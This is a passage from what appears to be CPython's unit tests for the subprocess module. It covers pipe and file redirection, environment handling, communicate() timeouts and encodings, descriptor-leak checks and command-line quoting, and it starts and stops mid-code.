d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
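# The three DEVNULL tests above rely on the same behavior: subprocess.DEVNULL
# connects the child's stream to os.devnull, while the parent-side
# p.stdin/p.stdout/p.stderr attribute stays None. A minimal sketch (not
# executed here; 'cmd' is a placeholder):
#
#     p = subprocess.Popen(cmd, stdout=subprocess.DEVNULL)
#     assert p.stdout is None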
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesizes(self):
test_pipe_r, test_pipe_w = os.pipe()
try:
# Get the default pipesize with F_GETPIPE_SZ
pipesize_default = fcntl.fcntl(test_pipe_w, fcntl.F_GETPIPE_SZ)
finally:
os.close(test_pipe_r)
os.close(test_pipe_w)
pipesize = pipesize_default // 2
if pipesize < 512: # the POSIX minimum
raise unittest.SkipTest(
'default pipesize too small to perform test.')
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=pipesize)
try:
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
pipesize)
# On Windows the pipe size could be read via the GetNamedPipeInfo function
# https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-getnamedpipeinfo
# but that function is not yet exposed through _winapi.
p.stdin.write(b"pear")
p.stdin.close()
p.stdout.close()
p.stderr.close()
finally:
p.kill()
p.wait()
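# Background for the two pipesize tests: the pipesize argument (added in
# Python 3.10) asks the kernel to resize the stdin/stdout/stderr pipes via
# fcntl(F_SETPIPE_SZ) on platforms that support it (e.g. Linux), while
# pipesize=-1 (the default) keeps the OS default size, which is what
# test_pipesize_default below relies on.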
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesize_default(self):
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=-1)
try:
fp_r, fp_w = os.pipe()
try:
default_pipesize = fcntl.fcntl(fp_w, fcntl.F_GETPIPE_SZ)
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
default_pipesize)
finally:
os.close(fp_r)
os.close(fp_w)
# On other platforms we cannot test the pipe size (yet). But above
# code using pipesize=-1 should not crash.
p.stdin.close()
p.stdout.close()
p.stderr.close()
finally:
p.kill()
p.wait()
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
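# Roughly, communicate() avoids the deadlock this test guards against by
# never blocking on a single pipe: in CPython the POSIX implementation
# multiplexes stdin/stdout/stderr with selectors, and the Windows
# implementation uses background reader/writer threads.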
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
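# In the universal-newlines tests above and below, text=True and
# universal_newlines=True are interchangeable: either one wraps the pipes in
# io.TextIOWrapper objects, so reads and writes use str and "\r\n"/"\r" are
# translated to "\n" on input.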
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# A Python debug build may push something like "[42442 refs]\n"
# to stderr when the subprocess exits.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, os_helper.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
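# The pair of bufsize=1 tests above reflects that line buffering only exists
# in text mode: in binary mode subprocess falls back to the default buffer
# size and emits the RuntimeWarning asserted above, so the unflushed line is
# lost when the fd is closed behind the writer's back.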
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could be
# set by a thread that does not actually hold the exit status,
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen(["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
path_cmd = pathlib.Path("my-tool.py")
pathlib_cls = path_cmd.__class__.__name__
cases = [
("ls", True, 123, "<Popen: returncode: 123 args: 'ls'>"),
('a' * 100, True, 0,
"<Popen: returncode: 0 args: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...>"),
(["ls"], False, None, "<Popen: returncode: None args: ['ls']>"),
(["ls", '--my-opts', 'a' * 100], False, None,
"<Popen: returncode: None args: ['ls', '--my-opts', 'aaaaaaaaaaaaaaaaaaaaaaaa...>"),
